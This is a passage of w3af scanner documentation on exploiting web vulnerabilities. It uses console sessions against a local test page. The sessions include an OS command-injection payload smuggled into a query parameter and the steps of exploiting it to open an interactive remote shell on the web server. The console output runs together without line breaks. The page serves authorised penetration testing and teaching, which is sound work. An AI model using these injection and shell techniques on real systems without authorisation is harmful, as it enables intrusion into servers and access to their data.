Exploiting Web application vulnerabilities

http://docs.w3af.org/en/latest/exploitation.html


w3af allows users to exploit Web application vulnerabilities in an automated manner. The vulnerabilities to be exploited can be identified using audit plugins or manually by the user (and then the vulnerability details are provided to w3af).

During the scan vulnerabilities are found and stored in specific locations of the knowledge base, from where exploit plugins can read and use the stored information to exploit the vulnerability. Exploiting a vulnerability identified by an audit plugin is easy:

w3af>>> pluginsw3af/plugins>>> audit os_commandingw3af/plugins>>> backw3af>>> targetw3af/config:target>>> set target http://localhost/w3af/os_commanding/v.php?command=f0as9w3af/config:target>>> backw3af>>> startFound 1 URLs and 1 different points of injection.The list of URLs is:- http://localhost/w3af/os_commanding/v.phpThe list of fuzzable requests is:- http://localhost/w3af/os_commanding/v.php | Method: GET | Parameters: (command)Starting os_commanding plugin execution.OS Commanding was found at: "http://localhost/w3af/os_commanding/v.php", using HTTP method GET.The sent data was: "command=+ping+-c+9+localhost". The vulnerability was found in the request with id 5.Finished scanning process.w3af>>> exploitw3af/exploit>>> exploit os_commandingos_commanding exploit plugin is starting.Vulnerability successfully exploited. This is a list of available shells:- [0] <os_commanding_shell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19")>Please use the interact command to interact with the shell objects.w3af/exploit>>> interact 0Execute "end_interaction" to get out of the remote shell.Commands typed in this menu will run on the remote web server.w3af/exploit/os_commanding-0>>> lsv.phpv2.phpv3.phpw3af/exploit/os_commanding-0>>> end_interactionw3af/exploit>>> backw3af>>>

Exploiting one you’ve found manually, requires you to provide some input:

w3af>>> kbw3af/kb>>> help| list            | List the items in the knowledge base.| add             | Add a vulnerability to the KBw3af/kb>>> add os_commandingw3af/kb/config:os_commanding>>> view| operating_system         | Remote operating system (linux or windows).| name                     | Vulnerability name (eg. SQL Injection)| url                      | URL (without query string parameters)| vulnerable_parameter     | Vulnerable parameter| separator                | Command separator used for injecting commands.| data                     | Query string or postdata parameters in url-encoded form| method                   | HTTP methodw3af/kb/config:os_commanding>>>

You simply set all the configuration settings and then execute save and back to store your vulnerability in the knowledge base. Once the information is there you’ll be able to follow the same steps:

w3af>>> exploitw3af/exploit>>> exploit os_commandingos_commanding exploit plugin is starting.Vulnerability successfully exploited. This is a list of available shells:- [0] <os_commanding_shell object (ruser: "www-data" | rsystem: "Linux brick 2.6.24-19")>Please use the interact command to interact with the shell objects.